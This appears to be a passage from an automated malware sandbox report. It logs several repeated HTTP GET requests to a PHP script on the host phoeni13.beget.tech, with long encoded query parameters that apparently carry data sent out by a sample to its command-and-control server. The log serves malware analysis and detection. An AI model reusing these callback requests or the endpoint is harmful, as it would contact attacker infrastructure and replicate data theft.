/19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.techConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=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 HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: phoeni13.beget.tech
Source: global traffic	HTTP traffic detected: GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nI5EjbJFTQq90dBp2T0UkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEFVaBzYE9keNpXT3llaapmTE1EMBpnT5VkaadXSDxUaVNUTp9maJtmWE9UbCpWWyUkaZhmRX1EbGR1TxkkMZxmVq1EboRUT3VkaOFzY6lFbCRVWwU0VPlmStplMJNETpV1QNdXRqlkNJNUTxEFVNJTWE5kMFR1TrJleNdXStpleZpmWwcGVORTUX9kaGpmWwEEVZhmWt5EbWpmT0UleNl2dpl0LJl2TpFlaZNTVtllaWdVTqZleNJTQ650asRVTqp0RP1mUH5kMZJTT41EValXVU10MZRVT0k1RPNzZql0cJNUTp9maJlmUq5kakRVWpZ1VatmQEpFbadVW410RPBTWqplMnRVWpZUbNlXUX9UeJpWWxMGVZRTRUpVaKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWR